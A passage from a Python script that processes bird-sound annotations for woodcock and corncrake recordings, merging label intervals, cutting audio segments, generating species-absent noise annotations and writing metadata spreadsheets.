#print('n_rows', len(df))\n df_list.append(df)\n\n\n # Concat and sort\n df = pd.concat(df_list).reset_index(drop=True)\n df = df.sort_values(['filename', 'start_time']).reset_index(drop=True)\n\n # Remove sub_dir col\n df = df.drop(columns=['sub_dir'])\n\n print(df)\n\n\n # Get unique audio files\n files = list(df['filename'].unique())\n n_files = len(files)\n print(files) # 'Peenemuende_140525_327_4ch', 'Schoenow_070401051656', 'Schoenow_070408045029', 'Schoenow_070505034545', 'Schoenow_070513034003', 'Schoenow_070520032033', 'Schoenow_070527032221', 'Schoenow_070603030318', 'Schoenow_070617025602', 'Schoenow_070624032240', 'Schoenow_080315061117', 'Schoenow_Ed2_080413045352', 'Schoenow_R4_1_090316050122', 'Schoenow_R4_1_090410040958']\n print('n_files', n_files)\n\n #quit()\n\n\n # Sanity checks (end_time - start_time = 5s)\n for ix, row in df.iterrows():\n if row['end_time'] - row['start_time'] != 5:\n print('Warning end_time-start_time != 5', ix)\n\n\n df_hakan = df.copy()\n\n # Create df with original annotations from Karl\n annotations_org_dir = root_dir + 'Scolopax_rusticola_Recordings/Monitoring/'\n df_annotations_org_list = []\n for file in files:\n path = annotations_org_dir + file + '.Table.1.selections.txt'\n if not os.path.isfile(path): print('Error: File not found', path)\n df = read_raven_label_file(path)\n\n # Drop cols Selection, View, Species\n df = df.drop(columns=['Selection', 'View', 'Species'])\n # Rename cols\n df = df.rename(columns={'Channel': 'channel_ix', 'Begin Time (s)': 'start_time', 'End Time (s)': 'end_time', 'Low Freq (Hz)': 'start_frequency', 'High Freq (Hz)': 'end_frequency'})\n # Rename Calltype, Soundtype, calltype --> vocalization_type\n df = df.rename(columns={'Calltype': 'vocalization_type'})\n df = df.rename(columns={'Soundtype': 'vocalization_type'})\n df = df.rename(columns={'calltype': 'vocalization_type'})\n # Subtract 1 for channel values\n df['channel_ix'] = df['channel_ix'] - 1\n # Add filename col\n df['filename'] = file\n # Reorder cols\n df = df[['filename', 'channel_ix', 'start_time', 'end_time', 'start_frequency', 'end_frequency', 'vocalization_type']]\n # Rename vocalization_type 1: sq, 2: gr (grunt, squeak)\n df.loc[df['vocalization_type'] == 1, 'vocalization_type'] = 'squeak'\n df.loc[df['vocalization_type'] == 2, 'vocalization_type'] = 'grunt'\n\n # Drop duplicates (e.g. both views are annotated Waveform 1 & Spectrogram 1)\n df = df.drop_duplicates().reset_index(drop=True)\n\n \n #print(df)\n\n df_annotations_org_list.append(df)\n\n # Concat and sort\n df_annotations_org = pd.concat(df_annotations_org_list).reset_index(drop=True)\n df_annotations_org = df_annotations_org.sort_values(['filename', 'start_time']).reset_index(drop=True)\n print(df_annotations_org)\n\n # Expand df_annotations_org with channel infos from hakan\n no_matches_counter = 0\n row_list_new = []\n for ix, row in df_annotations_org.iterrows():\n\n filename = row['filename']\n channel_ix = row['channel_ix']\n start_time = row['start_time']\n end_time = row['end_time']\n vocalization_type = row['vocalization_type']\n\n if vocalization_type == 'squeak':\n \n df_matching = df_hakan.loc[\n (df_hakan['filename'] == filename) &\n (df_hakan['start_time']-0.1 <= start_time) &\n (df_hakan['end_time']-3 >= end_time)\n #(df_hakan['start_time']-0.1 <= start_time) &\n #(df_hakan['end_time']-2 >= end_time)\n ].reset_index(drop=True)\n \n \n # #if(len(test.index) < 1):\n # if(len(df_matching.index) > 4):\n # no_matches_counter += 1\n # print(filename, channel_ix, start_time, end_time)\n # print(df_matching)\n\n if(len(df_matching.index) > 1):\n # Get channel list\n channel_ixs = list(df_matching['channel_ix'].unique())\n if channel_ix not in channel_ixs:\n no_matches_counter += 1\n #print()\n #print('Channel not matching', filename, channel_ix, start_time, end_time, channel_ixs)\n\n # Copy row and create new list of rows with missing channels\n #row_list = df_annotations_org.iloc[[ix]].values.tolist()\n row_list = df_annotations_org.iloc[[ix]].values.tolist()\n channel_ix_org = row_list[0][1]\n \n #print('channel_ix_org', channel_ix_org)\n for ix in channel_ixs:\n if ix != channel_ix_org:\n row_new = row_list[0].copy()\n row_new[1] = ix\n row_list_new.append(row_new)\n #print(row_list_new)\n\n #print('no_matches_counter', no_matches_counter)\n \n # Append extra channels rows \n df_annotations_org = df_annotations_org.append(pd.DataFrame(row_list_new, columns=df_annotations_org.columns)).reset_index(drop=True)\n # Reorder\n df_annotations_org = df_annotations_org.sort_values(['filename', 'start_time', 'channel_ix']).reset_index(drop=True)\n #print(df_annotations_org[:20])\n print(df_annotations_org)\n \n # Create df_dilation (add time interval to start/end time)\n dilation_duration = 4.0\n df_dilation = df_annotations_org.copy()\n df_dilation['start_time'] = df_dilation['start_time'] - dilation_duration\n df_dilation['end_time'] = df_dilation['end_time'] + dilation_duration\n print(df_dilation)\n\n # Check if start_time >= 0 & end_time <= duration ?\n df_dilation.loc[df_dilation['start_time'] < 0.0, 'start_time'] = 0.0\n\n \n\n # Create df_merged for original annotations\n df_merged_list = {}\n df_merged_list['filename'] = []\n df_merged_list['start_time'] = []\n df_merged_list['end_time'] = []\n \n filename = df_dilation.filename.values[0]\n start_time = df_dilation.start_time.values[0]\n end_time = df_dilation.end_time.values[0]\n #print(filename, start_time, end_time)\n\n max_time_without_annotation = 2 #10 #10 #2 #4\n\n for ix, row in df_dilation.iterrows():\n \n if row['filename'] != filename or row['start_time'] - end_time > max_time_without_annotation:\n # Add current values to df_merged_list\n df_merged_list['filename'].append(filename)\n df_merged_list['start_time'].append(start_time)\n df_merged_list['end_time'].append(end_time)\n # Init new \n filename = row['filename']\n start_time = row['start_time']\n end_time = row['end_time']\n else:\n end_time = row['end_time']\n\n # Add last row\n df_merged_list['filename'].append(filename)\n df_merged_list['start_time'].append(start_time)\n df_merged_list['end_time'].append(end_time)\n\n df_merged = pd.DataFrame.from_dict(df_merged_list)\n #print(df_merged)\n\n # Round times to nearest second\n df_merged['start_time'] = df_merged['start_time'].apply(np.floor)\n df_merged['end_time'] = df_merged['end_time'].apply(np.ceil)\n\n # Write audio parts and rename files according to annotation interval\n for ix, row in df_merged.iterrows():\n filename = row['filename']\n start_time = row['start_time'] # rounded to seconds\n end_time = row['end_time']\n \n filename_new = filename + create_postfix_str(start_time)\n df_merged.at[ix, 'filename_new'] = filename_new\n\n if write_audio_parts:\n path = src_dir + filename + '.wav'\n write_part_of_audio_file(path, start_time, end_time, dst_dir=dst_dir)\n\n \n print(df_merged)\n\n #quit()\n\n\n\n # Create df with annotation times relative to cuttet parts\n #df_new = df.copy()\n #df = df_hakan.copy()\n df = df_annotations_org.copy()\n #print(df)\n for ix, row in df.iterrows():\n filename = row['filename']\n channel_ix = row['channel_ix']\n start_time = row['start_time']\n end_time = row['end_time']\n #print(start_time.dtype)\n\n df_merged_row = df_merged.loc[\n (df_merged['filename'] == filename) &\n (df_merged['start_time'] <= start_time) &\n (df_merged['end_time'] >= end_time)\n ].reset_index(drop=True)\n \n assert len(df_merged_row.index) == 1\n\n filename_new = df_merged_row.at[0, 'filename_new']\n start_time_new = start_time - df_merged_row.at[0, 'start_time']\n end_time_new = end_time - df_merged_row.at[0, 'start_time']\n \n #print(filename, start_time, end_time, channel_ix, filename_new, df_merged_row.at[0, 'start_time'], df_merged_row.at[0, 'end_time'], start_time_new, end_time_new)\n\n df.at[ix, 'filename'] = filename_new\n df.at[ix, 'start_time'] = start_time_new\n df.at[ix, 'end_time'] = end_time_new\n\n \n #print(df[['filename', 'channel_ix', 'start_time', 'end_time', 'vocalization_type']])\n\n\n # Additional infos\n # id_level, species_latin_name, annotator_name, \n # record_date, record_filepath, recordist_name, \n # equipment_name, equipment_sound_device, equipment_microphone,\n # location_name, location_habitat, location_lat, location_lng\n # collection_name\n\n df['id_level'] = 1\n df['species_latin_name'] = 'Scolopax rusticola'\n df['annotator_name'] = 'Frommolt, Karl-Heinz'\n df['recordist_name'] = 'Frommolt, Karl-Heinz'\n \n df['location_name'] = None\n df['record_date'] = None\n df['record_time'] = None\n\n df['collection_name'] = 'devise'\n\n df['record_filepath'] = None\n\n\n # Get location and date from filename\n for ix, row in df.iterrows():\n filename = row['filename']\n parts = filename.split('_')\n location_name = parts[0]\n df.at[ix, 'location_name'] = location_name\n time_str = None\n \n if location_name == 'Peenemuende':\n # Peenemuende_140525_327_4ch_S00055000ms \n date_str = parts[1]\n \n else:\n # Schoenow_070401051656_S01146000ms, Schoenow_R4_1_090410040958_S01146000ms \n date_str = parts[-2]\n time_str = date_str[6:]\n \n time_str = time_str[:2] + ':' + time_str[2:4] + ':' + time_str[4:6]\n \n # From Artenspektrum2007.xlsx recording time +1 hour for some recordings?\n #time_str = str(int(time_str[:2]) + 1).zfill(2) + ':' + time_str[2:4] + ':' + time_str[4:6] \n \n data_str = '20' + date_str\n data_str = data_str[:4] + '-' + data_str[4:6] + '-' + data_str[6:8]\n #print(ix, parts, location_name, data_str, time_str)\n\n df.at[ix, 'record_date'] = data_str\n df.at[ix, 'record_time'] = time_str\n\n path_new = dst_dir + filename + '.wav'\n if not os.path.isfile(path_new): \n print('Error: File not found', path_new)\n\n df.at[ix, 'record_filepath'] = path_new\n\n\n # Write metadata (excel, csv)\n if write_metadata:\n df.to_excel(metadata_path_without_ext + '.xlsx', index=False, engine='openpyxl')\n #df.to_csv(metadata_path_without_ext + '.csv', index=False)\n\n\n print(df)\n\n#process_hakan_schoenow()\n\ndef postprocess_hakan_arsu(year):\n\n write_audio_parts = False # True False\n write_metadata = True\n \n src_dir = root_dir + 'Annotationen/ARSU_temp/'\n #dst_dir = root_dir + 'Annotationen/_Segments/temp/'\n dst_dir = root_dir + 'Annotationen/_Segments/Scolopax_rusticola/'\n metadata_path_without_ext = root_dir + 'Annotationen/_MetadataReadyForDbInsert/Scolopax_rusticola_ARSU_' + str(year) + '_v07'\n\n # Collect annotations from excel files\n xlsx_files = [\n #\"Scolopax_rusticola_Devise_ARSU_2021_v1.xlsx\",\n #\"Scolopax_rusticola_Devise_ARSU_2022_v1.xlsx\",\n 'Scolopax_rusticola_Devise_ARSU_' + str(year) + '_v1.xlsx'\n ]\n \n df_list = []\n for file in xlsx_files:\n path = src_dir + file\n\n if not os.path.isfile(path):\n print(\"Error: File not found\", path)\n\n df = pd.read_excel(path, keep_default_na=False, engine=\"openpyxl\")\n df_list.append(df)\n print(\"n_rows\", len(df))\n\n df = pd.concat(df_list).reset_index(drop=True)\n #print(df)\n\n # Get unique audio files\n files = list(df[\"filename\"].unique())\n n_files = len(files)\n # print(files)\n print(\"n_files\", n_files)\n\n\n\n # Create df_dilation (add time interval to start/end time)\n dilation_duration = 4.0\n df_dilation = df.copy()\n df_dilation['start_time'] = df_dilation['start_time'] - dilation_duration\n df_dilation['end_time'] = df_dilation['end_time'] + dilation_duration\n #print(df_dilation)\n\n # Check/correkt if start_time < 0 or end_time > duration\n #df_dilation.loc[df_dilation['start_time'] < 0.0, 'start_time'] = 0.0\n for ix, row in df_dilation.iterrows():\n if row['start_time'] < 0.0:\n df_dilation.at[ix, 'start_time'] = 0.0\n print(row['filename'], 'start_time < 0.0,', row['start_time'], '-->', df_dilation.at[ix, 'start_time'])\n # Get duration\n path = src_dir + 'Scolopax_rusticola_Devise_ARSU_' + str(year) + '/' + row['filename'] + '.flac'\n with sf.SoundFile(path) as f:\n duration = f.frames/f.samplerate\n if row['end_time'] > duration:\n df_dilation.at[ix, 'end_time'] = duration\n print(row['filename'], 'end_time > duration,', row['end_time'], '-->', df_dilation.at[ix, 'end_time'] )\n \n #quit()\n\n # Create df_merged for original annotations\n df_merged_list = {}\n df_merged_list['filename'] = []\n df_merged_list['start_time'] = []\n df_merged_list['end_time'] = []\n \n filename = df_dilation.filename.values[0]\n start_time = df_dilation.start_time.values[0]\n end_time = df_dilation.end_time.values[0]\n #print(filename, start_time, end_time)\n\n max_time_without_annotation = 2 #10 #2 #4\n\n for ix, row in df_dilation.iterrows():\n\n if row['filename'] != filename or row['start_time'] - end_time > max_time_without_annotation:\n # Add current values to df_merged_list\n df_merged_list['filename'].append(filename)\n df_merged_list['start_time'].append(start_time)\n df_merged_list['end_time'].append(end_time)\n # Init new \n filename = row['filename']\n start_time = row['start_time']\n end_time = row['end_time']\n else:\n end_time = row['end_time']\n\n # Add last row\n df_merged_list['filename'].append(filename)\n df_merged_list['start_time'].append(start_time)\n df_merged_list['end_time'].append(end_time)\n\n df_merged = pd.DataFrame.from_dict(df_merged_list)\n #print(df_merged)\n \n\n\n # Round times to nearest second\n df_merged['start_time'] = df_merged['start_time'].apply(np.floor)\n df_merged['end_time'] = df_merged['end_time'].apply(np.ceil)\n\n # Write audio parts and rename files according to annotation interval\n for ix, row in df_merged.iterrows():\n filename = row['filename']\n start_time = row['start_time'] # rounded to seconds\n end_time = row['end_time']\n \n filename_new = filename + create_postfix_str(start_time) + '_c0'\n df_merged.at[ix, 'filename_new'] = filename_new\n\n if write_audio_parts:\n path = src_dir + 'Scolopax_rusticola_Devise_ARSU_' + str(year) + '/' + filename + '.flac'\n print('Writing', filename_new)\n write_part_of_audio_file(path, start_time, end_time, channel_ix=0, dst_dir=dst_dir, format='wav')\n\n \n #print(df_merged)\n n_files_merged = len(df_merged)\n print('n_files_merged', n_files_merged)\n\n #quit()\n\n # Create df with annotation times relative to cuttet parts\n\n #print(df)\n for ix, row in df.iterrows():\n filename = row['filename']\n channel_ix = row['channel_ix']\n start_time = row['start_time']\n end_time = row['end_time']\n #print(start_time.dtype)\n\n df_merged_row = df_merged.loc[\n (df_merged['filename'] == filename) &\n (df_merged['start_time'] <= start_time) &\n (df_merged['end_time'] >= end_time)\n ].reset_index(drop=True)\n \n assert len(df_merged_row.index) == 1\n\n filename_new = df_merged_row.at[0, 'filename_new']\n start_time_new = start_time - df_merged_row.at[0, 'start_time']\n end_time_new = end_time - df_merged_row.at[0, 'start_time']\n \n #print(filename, start_time, end_time, channel_ix, filename_new, df_merged_row.at[0, 'start_time'], df_merged_row.at[0, 'end_time'], start_time_new, end_time_new)\n\n df.at[ix, 'filename'] = filename_new\n df.at[ix, 'start_time'] = start_time_new\n df.at[ix, 'end_time'] = end_time_new\n\n # Add file path\n df.at[ix, 'record_filepath'] = dst_dir + filename_new + '.wav'\n\n\n # Add channel info\n df['channel_ix'] = 0\n # Add id_level=1 (Tim knows)\n df['id_level'] = 1\n # Correct time format (e.g. 21-28-11 --> 21:28:11)\n df['record_time'] = df['record_time'].str.replace('-',':')\n\n # Add recording equipment info\n df['equipment_name'] = 'devise'\n\n\n # Rename cols\n df = df.rename(columns={\"quality\": \"quality_tag\"})\n df = df.rename(columns={\"has_background\": \"background_level\"})\n df = df.rename(columns={\"comment\": \"remarks\"})\n\n # Correct some mistakes\n df.loc[df['vocalization_type'] == '3', 'vocalization_type'] = 'grunt'\n df.loc[df['vocalization_type'] == 'sgr', 'vocalization_type'] = 'grunt'\n \n\n # Correct start/end freq (Tim only annotated time intervals!)\n df.loc[df['vocalization_type'] == 'grunt', 'start_frequency'] = 200.0\n df.loc[df['vocalization_type'] == 'grunt', 'end_frequency'] = 2500.0 # 2000/2500\n df.loc[df['vocalization_type'] == 'squeak', 'start_frequency'] = 1500.0 # 1500/2000\n df.loc[df['vocalization_type'] == 'squeak', 'end_frequency'] = None # 24000.0/NF/None\n \n print(df)\n\n\n\n # Write metadata (excel, csv)\n if write_metadata:\n df.to_excel(metadata_path_without_ext + '.xlsx', index=False, engine='openpyxl')\n #df.to_csv(metadata_path_without_ext + '.csv', index=False)\n\n#postprocess_hakan_arsu(2021)\n#postprocess_hakan_arsu(2022)\n\ndef get_arsu_background_annotations(year):\n\n # Beginn is equal to postprocess_hakan_arsu(year)\n # But noise will annotatied later via create_noise_annotations (using get_open_intervals)\n\n write_audio_parts = False # True False\n write_metadata = True\n \n src_dir = root_dir + 'Annotationen/ARSU_temp/'\n #dst_dir = root_dir + 'Annotationen/_Segments/temp/'\n #dst_dir = root_dir + 'Annotationen/_Segments/Scolopax_rusticola/'\n dst_dir = root_dir + 'Annotationen/_Segments/Scolopax_rusticola_BG/'\n metadata_path_without_ext = root_dir + 'Annotationen/_MetadataReadyForDbInsert/Scolopax_rusticola_BG_ARSU_' + str(year) + '_temp'\n\n # Collect annotations from excel files\n xlsx_files = [\n 'Scolopax_rusticola_Devise_ARSU_' + str(year) + '_v1.xlsx'\n ]\n \n df_list = []\n for file in xlsx_files:\n path = src_dir + file\n\n if not os.path.isfile(path):\n print(\"Error: File not found\", path)\n\n df = pd.read_excel(path, keep_default_na=False, engine=\"openpyxl\")\n df_list.append(df)\n print(\"n_rows\", len(df))\n\n df = pd.concat(df_list).reset_index(drop=True)\n #print(df)\n\n # Get unique audio files\n files = list(df[\"filename\"].unique())\n n_files = len(files)\n # print(files)\n print(\"n_files\", n_files)\n\n\n\n # Create df_dilation (add time interval to start/end time)\n dilation_duration = 4.0\n df_dilation = df.copy()\n df_dilation['start_time'] = df_dilation['start_time'] - dilation_duration\n df_dilation['end_time'] = df_dilation['end_time'] + dilation_duration\n #print(df_dilation)\n\n # Check/correkt if start_time < 0 or end_time > duration\n #df_dilation.loc[df_dilation['start_time'] < 0.0, 'start_time'] = 0.0\n for ix, row in df_dilation.iterrows():\n if row['start_time'] < 0.0:\n df_dilation.at[ix, 'start_time'] = 0.0\n print(row['filename'], 'start_time < 0.0,', row['start_time'], '-->', df_dilation.at[ix, 'start_time'])\n # Get duration\n path = src_dir + 'Scolopax_rusticola_Devise_ARSU_' + str(year) + '/' + row['filename'] + '.flac'\n with sf.SoundFile(path) as f:\n duration = f.frames/f.samplerate\n if row['end_time'] > duration:\n df_dilation.at[ix, 'end_time'] = duration\n print(row['filename'], 'end_time > duration,', row['end_time'], '-->', df_dilation.at[ix, 'end_time'] )\n \n #quit()\n\n # Create df_merged for original annotations\n df_merged_list = {}\n df_merged_list['filename'] = []\n df_merged_list['start_time'] = []\n df_merged_list['end_time'] = []\n \n filename = df_dilation.filename.values[0]\n start_time = df_dilation.start_time.values[0]\n end_time = df_dilation.end_time.values[0]\n #print(filename, start_time, end_time)\n\n max_time_without_annotation = 2 #10 #2 #4\n\n for ix, row in df_dilation.iterrows():\n\n if row['filename'] != filename or row['start_time'] - end_time > max_time_without_annotation:\n # Add current values to df_merged_list\n df_merged_list['filename'].append(filename)\n df_merged_list['start_time'].append(start_time)\n df_merged_list['end_time'].append(end_time)\n # Init new \n filename = row['filename']\n start_time = row['start_time']\n end_time = row['end_time']\n else:\n end_time = row['end_time']\n\n # Add last row\n df_merged_list['filename'].append(filename)\n df_merged_list['start_time'].append(start_time)\n df_merged_list['end_time'].append(end_time)\n\n df_merged = pd.DataFrame.from_dict(df_merged_list)\n #print(df_merged)\n \n\n\n # Round times to nearest second\n df_merged['start_time'] = df_merged['start_time'].apply(np.floor)\n df_merged['end_time'] = df_merged['end_time'].apply(np.ceil)\n\n print(df_merged)\n n_files_merged = len(df_merged)\n print('n_files_merged', n_files_merged)\n\n \n\n # Create noise (species absent) annotations\n\n # Add record_filepath to df_merged (to get duration)\n df_merged['record_filepath'] = src_dir + 'Scolopax_rusticola_Devise_ARSU_' + str(year) + '/' + df_merged['filename'] + '.flac'\n \n\n df = create_noise_annotations(df_merged, dilation_duration=0.0, min_duration=5.0)\n df['noise_name'] = 'Scolopax rusticola absent'\n \n # Get total duration of noise annotations (and species annotations)\n print('noise_duration_total', (df['end_time']-df['start_time']).sum()) # 257190.02933333334\n print('species_duration_total', (df_merged['end_time']-df_merged['start_time']).sum()) # 7688.0\n\n #print(df)\n\n # Reduce noise annotations (to beginning and end parts)\n df = divide_intervals_into_beginning_and_end(df, segment_duration=20.0, segment_duration_max=50.0, segment_duration_min=10.0)\n\n # Round times to nearest second\n df['start_time'] = df['start_time'].apply(np.floor)\n df['end_time'] = df['end_time'].apply(np.floor)\n\n # Sanity checks and corrections for start_time (shoud not be negative)\n if not df.loc[df['start_time'] < 0.0].empty:\n print('Warning negative start_time:', df.loc[df['start_time'] < 0.0])\n df.loc[df['start_time'] < 0.0, 'start_time'] = 0.0 \n\n # Devise04_2022-06-16T02-47-13_s01852000ms_c0 makes problems when reading part via soundfile\n if year == 2022:\n df = df.drop(df[(df.filename == 'Devise04_2022-06-16T02-47-13') & (df.start_time == 1852)].index)\n\n \n print('noise_duration_total', (df['end_time']-df['start_time']).sum()) # 16300.0\n\n print(df)\n\n #quit()\n\n # Write audio parts and rename files according to annotation interval\n for ix, row in df.iterrows():\n filename = row['filename']\n start_time = row['start_time'] # rounded to seconds\n end_time = row['end_time']\n \n filename_new = filename + create_postfix_str(start_time, add_start_time_even_if_zero=True) + '_c0'\n df.at[ix, 'filename_new'] = filename_new\n\n if write_audio_parts:\n path = src_dir + 'Scolopax_rusticola_Devise_ARSU_' + str(year) + '/' + filename + '.flac'\n print('Writing', filename_new)\n write_part_of_audio_file(path, start_time, end_time, channel_ix=0, dst_dir=dst_dir, format='wav', add_start_time_even_if_zero=True)\n\n \n #print(df)\n\n #quit()\n\n # Add metadata:\n df['id_level'] = 1\n df['annotator_name'] = 'Steinkamp, Tim'\n df['recordist_name'] = 'Steinkamp, Tim'\n df['location_name'] = 'Gellener Torfmöörte'\n df['equipment_name'] = 'devise'\n df['collection_name'] = 'devise'\n \n # Adjust path to new filename\n df['record_filepath'] = dst_dir + df['filename_new'] + '.wav'\n\n\n # Add record_date, record_time from filename and adjust start/end time to 0.0 and duration of file\n df['record_date'] = None\n df['record_time'] = None\n for ix, row in df.iterrows():\n df.at[ix, 'record_date'] = row['filename'].split('_')[1][:10]\n df.at[ix, 'record_time'] = row['filename'].split('_')[1][11:19].replace(\"-\", \":\")\n\n # Check and adjust start/end time (to 0.0, duration)\n path = dst_dir + row['filename_new'] + '.wav'\n with sf.SoundFile(path) as f:\n duration = f.frames/f.samplerate\n assert row['end_time'] - row['start_time'] == duration\n df.at[ix, 'start_time'] = 0.0\n df.at[ix, 'end_time'] = duration\n\n\n #df.at[ix, 'filename'] = filename_new\n \n # Replace filename with filename_new\n df['filename'] = df['filename_new']\n df = df.drop(columns=['filename_new'])\n\n print(df)\n\n\n # Write metadata (excel, csv)\n if write_metadata:\n df.to_excel(metadata_path_without_ext + '.xlsx', index=False, engine='openpyxl')\n #df.to_csv(metadata_path_without_ext + '.csv', index=False)\n\n#get_arsu_background_annotations(2022)\n#get_arsu_background_annotations(2021)\n\ndef process_Lars_Annotations():\n\n write_metadata = True\n \n metadata_path_without_ext = root_dir + 'Annotationen/_MetadataReadyForDbInsert/CrexCrex_LarsAnnotaions_v03'\n\n df_list = []\n\n # Search for audacity label track txt files\n #root_src_dir = lars_dir + 'Criewen_2022_05_15/'\n #root_src_dir = lars_dir + 'Unteres_Odertal_2021_06_10/'\n #root_src_dir = lars_dir + 'Unteres_Odertal_2021_06_16/'\n #root_src_dir = lars_dir + 'Unteres_Odertal_2021_06_23/'\n #root_src_dir = lars_dir + 'Unteres_Odertal_2021_07_15/'\n #root_src_dir = lars_dir + 'Crex_crex Tierstimmenarchiv'\n\n # All Lars Annotations\n root_src_dir = lars_dir\n \n n_files = 0\n for root, dirs, files in os.walk(root_src_dir):\n for file in files:\n # Only use txt file with corresponing wav file\n if file.endswith('.txt'):\n path = os.path.join(root, file)\n path_wav = path[:-4] + '.wav'\n if os.path.isfile(path_wav): \n print(path)\n df = read_audacity_label_file(path, ignore_freq_range=True)\n #if df is not None:\n df = process_audacity_label_data(df, check_label_data=False)\n\n # Add filename, record_filepath\n df['record_filepath'] = path_wav\n df['filename'] = os.path.splitext(os.path.basename(path_wav))[0]\n #print(df)\n\n df_list.append(df)\n else:\n print('Warning no corresponding wav file', path)\n \n n_files += 1\n \n \n # Concat and sort\n df = pd.concat(df_list).reset_index(drop=True)\n df = df.sort_values(['filename', 'start_time']).reset_index(drop=True)\n\n # Move filename to front\n df.insert(0, 'filename', df.pop('filename'))\n\n print(df)\n\n # Check distinct species/bg events\n species_unique = list(df[\"species\"].unique())\n print('species_unique', species_unique) # ['Crex crex BG', 'wind', 'Crex crex']\n\n # Postprocess annotations\n\n # Rename cols\n df = df.rename(columns={\"species\": \"species_latin_name\"})\n df = df.rename(columns={\"call_type\": \"vocalization_type\"})\n df = df.rename(columns={\"quality\": \"quality_tag\"})\n df = df.rename(columns={\"comment\": \"remarks\"})\n\n # Add cols\n df['record_date'] = None\n df['record_time'] = None\n df['location_name'] = None\n df['noise_name'] = None\n df['annotator_name'] = 'Beck, Lars'\n df['recordist_name'] = 'Frommolt, Karl-Heinz'\n df['collection_name'] = 'devise'\n\n # Add infos\n for ix, row in df.iterrows():\n filename = row['filename']\n species = row['species_latin_name']\n\n filename_parts = filename.split('_')\n\n if filename.startswith('CRIEWEN'):\n df.at[ix, 'location_name'] = 'Criewen'\n df.at[ix, 'record_date'] = filename_parts[1][:4] + '-' + filename_parts[1][4:6] + '-' + filename_parts[1][6:8]\n df.at[ix, 'record_time'] = filename_parts[2][:2] + ':' + filename_parts[2][2:4] + ':' + filename_parts[2][4:6]\n\n if filename.startswith('Devise'):\n df.at[ix, 'location_name'] = 'Unteres Odertal'\n df.at[ix, 'record_date'] = filename_parts[1][:10]\n df.at[ix, 'record_time'] = filename_parts[1][11:19].replace(\"-\", \":\")\n\n if species != 'Crex crex':\n df.at[ix, 'species_latin_name'] = None\n if species == 'Crex crex BG':\n df.at[ix, 'noise_name'] = 'Crex crex absent'\n else:\n df.at[ix, 'noise_name'] = species\n print(ix, filename, species)\n\n\n # Correct vocalization_type = s --> song\n df.loc[df['vocalization_type'] == 's', 'vocalization_type'] = 'song'\n \n \n # Write metadata (excel, csv)\n if write_metadata:\n df.to_excel(metadata_path_without_ext + '.xlsx', index=False, engine='openpyxl')\n\n#process_Lars_Annotations()\n\n\ndef process_fva():\n\n write_metadata = False # True False\n metadata_path_without_ext = root_dir + 'Annotationen/_MetadataReadyForDbInsert/Scolopax_rusticola_FVA_v02'\n\n\n audio_src_dir = metadata_dir + 'Scolopax_rusticola_FVA_BadenWürttemberg/Dateien_MFN_FVA/'\n\n # Read excel file\n path = metadata_dir + 'Scolopax_rusticola_FVA_BadenWürttemberg/220722_fva_selections.csv'\n\n if not os.path.isfile(path): \n print('Error: File not found', path)\n\n #encoding = 'cp1252'\n encoding = 'ISO-8859-1'\n df = pd.read_csv(path, sep=';', encoding=encoding)\n #print(df.columns.values.tolist())\n \n # Drop cols not used (yet)\n df = df.drop(columns=[' \"id\"', 'Unnamed: 0', 'deploy_id', 'dateiname', 'selection', 'view', 'channel', 'species_code', 'common_name', 'import'])\n \n \n \n # Sort by (new) file name and begin_time\n df = df.sort_values(['new_name', 'begin_time']).reset_index(drop=True)\n\n #print(df[10:30])\n\n print(\"n_annotations\", len(df)) # 2497\n\n # Get unique audio files\n files = list(df['new_name'].unique())\n n_files = len(files)\n #print(files)\n print('n_files', n_files) # 369 (10min, mono, 48 kHz)\n\n # Get unique anmerkung\n remarks = list(df['anmerkung'].unique())\n n_remarks = len(remarks)\n #print(remarks)\n print('n_remarks', n_remarks) # 64\n\n # Rename cols\n df = df.rename(columns={'new_name': 'filename', 'begin_time': 'start_time', 'low_freq': 'start_frequency', 'high_freq': 'end_frequency', 'anmerkung': 'remarks'})\n \n # Add metadata\n \n df['record_date'] = None\n df['record_time'] = None\n\n df['vocalization_type'] = None\n df['quality_tag'] = 3\n df['record_filepath'] = None\n\n \n for ix, row in df.iterrows():\n\n # Get vocalization_type from anmerkung (remarks)\n remark = row['remarks']\n if 'puitzen' in remark and not 'quorren' in remark:\n df.at[ix, 'vocalization_type'] = 'squeak'\n if not 'puitzen' in remark and 'quorren' in remark:\n df.at[ix, 'vocalization_type'] = 'grunt'\n\n # # ToDo: correct/add type depending on start/end_frequency\n # if row['start_frequency'] > 1800.0 and row['end_frequency'] > 9000.0:\n # df.at[ix, 'vocalization_type'] = 'squeak'\n # if row['end_frequency'] < 5000.0:\n # t=1\n\n\n\n # Get quality from anmerkung\n if 'gut' in remark:\n df.at[ix, 'quality_tag'] = 2\n if 'sehr gut' in remark or 'laut' in remark or 'deutlich' in remark:\n df.at[ix, 'quality_tag'] = 1\n if 'leise' in remark or 'Knacken' in remark or 'Regen' in remark or 'schlechte Qualität' in remark:\n df.at[ix, 'quality_tag'] = 4\n if 'sehr leise' in remark:\n df.at[ix, 'quality_tag'] = 5\n\n # Get date, time from filename\n parts = row['filename'].split('_')\n date_str = parts[6]\n df.at[ix, 'record_date'] = date_str[:4] + '-' + date_str[4:6] + '-' + date_str[6:10]\n time_str = parts[7]\n df.at[ix, 'record_time'] = time_str[:2] + ':' + time_str[2:4] + ':' + time_str[4:6]\n\n # Get record_filepath\n df.at[ix, 'record_filepath'] = audio_src_dir + row['filename']\n\n #print(ix, remark, date_str, time_str)\n \n \n #print(df[:8])\n\n # Add more global metadata\n df['location_name'] = 'Baden-Württemberg'\n df['record_license'] = 'Usage restricted for training devise models!'\n df['record_remarks'] = 'Provided by Forstliche Versuchs- und Forschungsanstalt Baden-Württemberg (FVA). Only use for training (devise) models!'\n df['equipment_name'] = 'AudioMoth'\n df['equipment_sound_device'] = 'AudioMoth'\n df['equipment_microphone'] = 'MEMS'\n df['species_latin_name'] = 'Scolopax rusticola'\n df['collection_name'] = 'FVA (devise)' # ?\n\n #print(df[:8])\n\n # Create noise (species absent) annotations\n # Unfortunately not reliable\n # Some weak signals are not annotated, e.g. 14569_1_2020_06_11_FVA133_20200611_194506.WAV 116,18898 - 369,0195s)\n df_noise = create_noise_annotations(df)\n df_noise['noise_name'] = 'Scolopax rusticola absent'\n \n # Concat dfs\n df['noise_name'] = None\n df = pd.concat([df, df_noise], ignore_index=True, sort=False).reset_index(drop=True)\n \n \n \n # Write metadata (excel, csv)\n if write_metadata:\n df.to_excel(metadata_path_without_ext + '.xlsx', index=False, engine='openpyxl')\n #df.to_csv(metadata_path_without_ext + '.csv', index=False)\n \n #print(df)\n\n#process_fva()\n\ndef 